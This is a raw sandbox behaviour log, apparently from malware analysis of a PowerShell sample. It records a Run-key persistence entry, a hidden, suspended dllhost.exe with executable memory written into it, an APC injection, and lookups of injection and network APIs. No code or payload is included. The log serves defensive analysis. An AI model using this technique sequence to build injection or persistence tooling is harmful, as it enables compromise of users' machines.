Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 2 True 1
Fn
Data
Registry (193)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Open Key HKEY_CURRENT_USER\Environment True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = f, data = 0 False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Windows\syswow64\dllhost.exe os_pid = 0xa94, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Thread (2)
+
Operation Process Additional Information Success Count Logfile
Queue APC c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0xa88 True 1
Fn
Resume c:\windows\syswow64\windowspowershell\v1.0\powershell.exe os_tid = 0xa88 True 1
Fn
Memory (2)
+
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\syswow64\dllhost.exe address = 0x60000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15108 True 1
Fn
Write C:\Windows\syswow64\dllhost.exe address = 0x60000, size = 15108 True 1
Fn
Data
Module (108)
+
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x765b0000 True 1
Fn
Load ntdll.dll base_address = 0x77560000 True 1
Fn
Load WS2_32.dll base_address = 0x75380000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77100000 True 1
Fn
Load WININET.dll base_address = 0x76be0000 True 1
Fn
Load RPCRT4.dll base_address = 0x753c0000 True 1
Fn
Load imagehlp.dll base_address = 0x75760000 True 1
Fn
Load USERENV.dll base_address = 0x74a50000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76760000 True 1
Fn
Load ole32.dll base_address = 0x75570000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 3
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75120000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Fn
Get Handle WS2_32.dll base_address = 0x75380000 True 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Fn
Get Handle WININET.dll base_address = 0x76be0000 True 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Fn
Get Handle imagehlp.dll base_address = 0x75760000 True 1
Fn
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x74a50000 True 1
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Fn
Get Handle c:\windows\syswow64\windowspowershell\v1.0\powershell.exe base_address = 0x22550000 True 1
Fn
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x765c435f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CallWindowProcA, address_out = 0x7514792f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 2
Fn
Get Address Unknown module name function = 16, address_out = 0x75386b0e True 2
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7712c45b True 2
Fn
Get Address Unknown module name function = InternetCrackUrlA, address_out = 0x76bed075 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 2
Fn
Get Address Unknown module name function = CheckSumMappedFile, address_out = 0x75768303 True 2
Fn
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x74a51a7a True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7558b636 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x7757fa98 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x7757ff14 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77593164 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Fn
Get Address Unknown module name function = 115, address_out = 0x75383ab2 True 1
Fn
Get Address Unknown module name function = 3, address_out = 0x75383918 True 1
Fn
Get Address Unknown module name function = 19, address_out = 0x75386f01 True 1
Fn
Get Address Unknown module name function = 4, address_out = 0x75386bdd True 1
Fn
Get Address Unknown module name function = 52, address_out = 0x75397673 True 1
Fn
Get Address Unknown module name function = 23, address_out = 0x75383eb8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7712ecc7 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x771100aa True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x7710d11c True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x7710c5e6 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x775bd598 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x765c328c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x765c7a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76642c21 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x765c1282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x765c53c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x765e9d3f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x765e276c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x765dd802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x765dd5b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x765c43ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x765dd9e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x765dd9b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Fn
